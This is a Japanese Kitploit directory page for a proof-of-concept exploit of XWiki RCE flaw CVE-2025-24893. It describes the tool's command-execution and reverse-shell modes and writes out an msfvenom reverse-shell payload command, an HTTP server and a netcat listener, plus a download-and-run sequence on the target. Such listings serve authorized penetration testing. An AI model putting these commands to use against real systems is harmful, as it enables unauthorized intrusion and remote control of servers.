Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-24893 — PoCはCVE-2025-24893を悪用します。これは、非同期にレンダリングされるGroovyマクロにおける不適切なサンドボックス処理に起因する、XWikiのリモートコード実行(RCE)脆弱性です。RSSベースのSolrSearchエンドポイントへのインジェクションを通じて、任意のコマンド実行が可能になります。 | Kitploit
ツール/GitHubGitHub/infinit3i/cve-2025-24893
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用コマンド&コントロール
GitHubinfinit3i/cve-2025-24893

CVE-2025-24893

PoCはCVE-2025-24893を悪用します。これは、非同期にレンダリングされるGroovyマクロにおける不適切なサンドボックス処理に起因する、XWikiのリモートコード実行(RCE)脆弱性です。RSSベースのSolrSearchエンドポイントへのインジェクションを通じて、任意のコマンド実行が可能になります。

リポジトリを見る
6111ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

XWiki CVE-2025-24893 概念実証

著者: Net.Doge & Infinit3i


CVE-2025-24893 画像



Twitter Follow


このPythonスクリプトは、CVE-2025-24893 を悪用します。これは、非同期にレンダリングされるGroovyマクロの不適切なサンドボックス化に起因する XWiki のリモートコード実行(RCE)脆弱性です。RSSベースのSolrSearchエンドポイントへのインジェクションを通じて、任意のコマンド実行を可能にします。

📌 機能

  • Groovyインジェクションによる単一コマンド実行
  • リバースシェルペイロードの自動生成(msfvenom を使用)
  • カスタマイズオプション:
    • リモートターゲット
    • ローカルIPアドレス
    • HTTPサーバーポート
    • リバースシェルビーコンポート
  • クリーンなbashペイロードプレビュー
  • ANSIカラーコードによるインタラクティブTUI

🚀 使用方法

  1. スクリプトをクローンまたはダウンロードします。

  2. 次のものがインストールされていることを確認してください:

    • Metasploit の msfvenom
    • Python 3
    • jq(bashペイロードで使用)
  3. スクリプトを実行します:

root@kitploit:~
python3 CVE-2025-24893-PoC.py
  1. メニューから選択します:

    • コマンド実行 – 任意のシェルコマンドをリモートで実行します。
    • リバースシェル – ELFリバースシェルを生成し、ターゲットに展開します。
    • 設定変更 – LHOST、RHOST、サーバーポート、またはビーコンポートを変更します。

🧪 リバースシェルのワークフロー

  1. ペイロードが生成されます:
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
  1. Python HTTPサーバーとnetcatリスナーを起動するよう求められます:
root@kitploit:~
python3 -m http.server 8080
nc -lvnp 31337
  1. スクリプトは以下の一連の操作をターゲットに送信します:

    • ペイロードをダウンロード
    • 実行可能にする
    • バイナリを実行

⚠️ 免責事項

このツールは教育目的および許可を得たテスト目的のみで使用してください。あなたが所有していない、または明示的な許可を得ていないシステムへの不正使用は違法であり、非倫理的です。

📄 参考

  • XWiki
  • MITRE CVE-2025-24893
ツールをダウンロード